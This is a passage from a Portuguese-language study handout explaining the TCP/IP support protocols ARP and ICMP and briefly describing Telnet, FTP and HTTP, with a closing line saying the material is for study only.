TCP/IP TEM IMPORTANTES FUNÇÕES, EMBORA ESSAS
FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS
COM A TRANSMISSÃO DE DADOS: (ARP= ADDRESS
RESOLUTION PROTOCOL, OU PROTOCOLO DE
RESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET
CONTROL MESSAGE PROTOCOL, OU PROTOCOLO DE
RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O
ICMP SÃO PROTOCOLOS DE MANUTENÇÃO QUE MANTÉM
A ESTRUTURA DO IP E USUALMENTE SÃO INVISÍVEIS AOS
USUÁRIOS E AS APLICAÇÕES.

OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP


DA ORIGEM QUANTO DO DESTINO, MAS O ENDEREÇO DO
HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM
UM ENDEREÇO DE HARDWARE DE UM DETERMINADO
SISTEMA DIFUNDINDO PELA REDE UM PACOTE ESPECIAL
DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO)
CONTENDO O ENDEREÇO IP DO SISTEMA COM O QUAL
ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DA REDE
LOCAL QUE TIVEREM O ARP HABILITADO DETECTAM ESSA
DIFUSÃO, E O SISTEMA QUE TEM O NÚMERO DE IP EM
QUESTÃO ENVIA UM PACOTE ARP CONTENDO O
ENDEREÇO DE HARDWARE PARA O COMPUTADOR QUE
SOLICITOU. O ENDEREÇO DE HARWARE E O ENDEREÇO
DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO
FUTURO. COMO A RESPOSTA ARP TAMBÉM É FEITA NA
FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓS USEM
INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP.

O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP


COMPARTILHEM O STATUS DO IP E INFORMAÇÕE DE
ERRO. ESSA INFORMAÇÃO PODE SER USADA POR
PROTOCOLOS DE ALTO NÍVEL PARA TRATAR PROBLEMAS
DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDE
PARA DETECTAR PROBLEMAS NA REDE. EMBORA
ESTEJAM ENCAPSULADOS EM PACOTES IP, O ICMP NÃO É
CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É
NECESSÁRIO EM TODA IMPLEMENTAÇÃO DO TCP/IP. O
UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICAR SE
UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL.
ISTO É UTIL PARA DETECTAR PROBLEMAS EM REDES IP
UO FALHAS EM GATEWAYS.

OUTROS PROTOCOLOS
ALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS
PROTOCOLOS DE ALTO NÍVEL, COMO O TELNET, FTP, HTTP
E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES:

TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM


MÁQUINA REMOTAS. VOCÊ PASSA A UTILIZAR A MÁQUINA
REMOTA PARA REALIZAR O PROCESSAMENTO. NO
WINDOWS NT EXISTE O RAS (REMOTE ACCESS SERVICE,
SERVIÇO DE ACESSO REMOTO) QUE TEM OS MESMOS
OBJETIVOS DO TELNET.

FTP: É UM PROTOCOLO UTILIZADO PARA FAZER


TRANSFERÊNCIA DE ARQUIVOS.

HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE


TRANSMITE TEXTOS, GRÁFICOS E QUALQUER OUTRO TIPO
DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR A
NAVEGAÇÃO ATRAVÉS DE HIPER TEXTO.

Leia com Atenção


Lembrando que o conteúdo desta apostila é apenas pra estudo e
conhecimento dos usuarios de internet.

You might also like